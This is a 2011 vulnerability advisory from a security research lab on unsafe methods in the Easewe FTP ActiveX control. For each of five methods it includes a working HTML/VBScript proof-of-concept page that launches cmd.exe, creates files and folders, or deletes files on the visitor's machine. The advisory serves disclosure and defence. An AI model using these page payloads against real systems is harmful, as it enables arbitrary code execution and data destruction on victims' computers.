Stay in Touch

Application security insights and invitations to exclusive events in your inbox


Your data will stay confidential Private and Confidential

Easewe FTP ActiveX Control Multiple Insecure Methods

Advisory ID:HTB23015
Product:Easewe FTP OCX ActiveX Control
Vendor:Easewe Software
Vulnerable Versions:4.5.0.9 and probably prior
Tested Version:4.5.0.9
Advisory Publication:June 1, 2011 [without technical details]
Vendor Notification:June 1, 2011
Public Disclosure:June 22, 2011
Vulnerability Type:Exposed Unsafe ActiveX Method [CWE-618]
Risk Level:Critical
CVSSv2 Base Score:10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Solution Status:Not Fixed
Discovered and Provided:High-Tech Bridge Security Research Lab
 

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Easewe FTP OCX ActiveX Control, which can be exploited to potentially compromise a user's system.

1) Insecure methods in Easewe FTP ActiveX Control
1.1 The vulnerability is caused due to the EaseWeFtp.FtpLibrary ActiveX control (EaseWeFtp.ocx) including the insecure "Execute()" method. This can be exploited to execute arbitrary local files via specially crafted parameters passed to the affected method.
The following PoC code is available:
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Execute arg1 ,arg2 ,arg3
End Sub
</script>
</html>

1.2 The vulnerability is caused due to the EaseWeFtp.FtpLibrary ActiveX control (EaseWeFtp.ocx) including the insecure "Run()" method. This can be exploited to execute arbitrary local files via specially crafted parameters passed to the affected method.
The following PoC code is available:
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Run arg1 ,arg2 ,arg3
End Sub
</script>
</html>

1.3 The vulnerability is caused due to the EaseWeFtp.FtpLibrary ActiveX control (EaseWeFtp.ocx) including the insecure "CreateLocalFile()" method. This can be exploited to create empty files in the context of the current user.
The following PoC code is available:
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_create"
target.CreateLocalFile arg1
End Sub
</script>
</html>

1.4 The vulnerability is caused due to the EaseWeFtp.FtpLibrary ActiveX control (EaseWeFtp.ocx) including the insecure "CreateLocalFolder()" method. This can be exploited to create arbitrary folders in the context of the current user.
The following PoC code is available:
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="Directorypath\Directory"
target.CreateLocalFolder arg1
End Sub
</script>
</html>

1.5 The vulnerability is caused due to the EaseWeFtp.FtpLibrary ActiveX control (EaseWeFtp.ocx) including the insecure "DeleteLocalFile()" method. This can be exploited delete files in the context of the current user.
The following PoC code is available:
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_delete"
target.DeleteLocalFile arg1
End Sub
</script>
</html>


ImmuniWeb® On-Demand Web Application Penetration Test


Solution:
Currently we are not aware of any vendor-supplied patches or other solutions. The vendor was contacted in accordance to our Vendor Notification Policy but we didn't get any answer or feedback.


References:
[1] High-Tech Bridge Advisory HTB23015 - https://www.immuniweb.com/advisory/HTB23015 - Easewe FTP ActiveX Control Multiple Insecure Methods
[2] Easewe FTP ActiveX Control - ftpocx.com - Easewe FTP OCX ActiveX Control is a powerful and easy-to-use ftp activex component, supports all standard ftp features,such as upload/download files with resume capability,create/remove directory,delete/rename files, etc.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
Previous Security Advisories with CWE-618: HTB23013: Insecure Method in aTube Catcher ActiveX Control
User Comments
Add Comment


Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Quick Start
Technology
Products
Free Trial